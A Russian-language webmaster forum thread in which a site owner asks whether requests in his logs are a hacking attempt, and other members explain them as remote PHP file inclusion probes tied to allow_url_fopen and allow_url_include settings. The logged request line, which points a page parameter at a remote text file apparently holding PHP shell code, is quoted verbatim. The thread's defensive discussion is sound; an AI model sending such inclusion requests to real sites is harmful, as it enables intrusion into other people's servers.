это мне пытались залить руткит?

dex
На сайте с 14.04.2006
Offline
231
dex
2232

всех приветствую

наше в логах вот такие страницы

http:/mysite.ru/main.php?x=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?

посмотрел файл http://www.shaunabanks.com/ct/includes/gif2png/test.txt? - не зазенден - всякие фукции пхп, типа шеллов и т.п...

в гугле поглядел - http://www.google.ru/search?complete=1&hl=ru&newwindow=1&q=shaunabanks.com%2Fct%2Fincludes%2Fgif2png%2Ftest.txt%3F&lr=lang_ru&aq=f полно таких сайтов с иклюдом в индексе...

вопрос - надо ли писать абузу на товарищей, или у меня паранойя?

губит людей вода (подпись не продаю, в долг не даю)
Igorrok
На сайте с 28.08.2007
Offline
117
#1

Их мониторят на уязвимости, гуглом находится множество сайтов с инклюдами.

Истина где-то рядом...
dex
На сайте с 14.04.2006
Offline
231
dex
#2

так вопрос-то - имеет ли смысл написать жалобу на shaunabanks.com, где как раз код для взлома расположен?

или я выдумал и там все нормально?

(сам понимаю, что достаточно не иметь дырок в пхп, но все же надежнее, если еще и выключать будут сайты-источники гадости..)

Igorrok
На сайте с 28.08.2007
Offline
117
#3

Не думаю что сайты так просто удалят за размещение так текстового файла с вредоносным кодом, хотя там все так явно...

Zaqwr
На сайте с 08.08.2007
Offline
111
#4

а что там вредоносного?

Администрирование, Linux, Cisco, Juniper
dkameleon
На сайте с 09.12.2005
Offline
386
#5

dex, попытка remote php code include

вполне может сработать, если значение параметра инклюдится как обычный файл и разрешены allow_url_fopen

shaunabanks судя по урлу, сам поломан :)

А ваш сайт не мешало бы таки проверить как минимум на такую уязвимость и залатать в случае наличия.

Дизайн интерьера (http://balabukha.com/)
[Удален]
#6
dkameleon:
dex

вполне может сработать, если значение параметра инклюдится

вот эти гады и перекашивают траф в не-ру, прегуржают сервак и т.п. - шутка ли - перебрать все возможные переменные для инклюда:)

?x=... - пока дошли до предпоследней односимвольной переменной...

ps - думаю абузить надо, несмотря на возможную поломанность самого источника кода - пусть хоть уберут этот файл...

K
На сайте с 08.06.2006
Offline
25
#7
dkameleon:
dex,
вполне может сработать, если значение параметра инклюдится как обычный файл и разрешены allow_url_fopen

Может allow_url_include? Или именно allow_url_fopen?

[Удален]
#8
Kodhi:
Может allow_url_include? Или именно allow_url_fopen?

думаю - первое

вот интересно - возможно ли узнать извне о включеннолсти этой опции (ингда включаю - никак без этого) - в смысле - сам и провоцирую переборы...

?

dkameleon
На сайте с 09.12.2005
Offline
386
#9
Kodhi:
Может allow_url_include? Или именно allow_url_fopen?

ну если найдёте в списке настроек интерпретатора такую опцию, то наверное будет и она :))

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий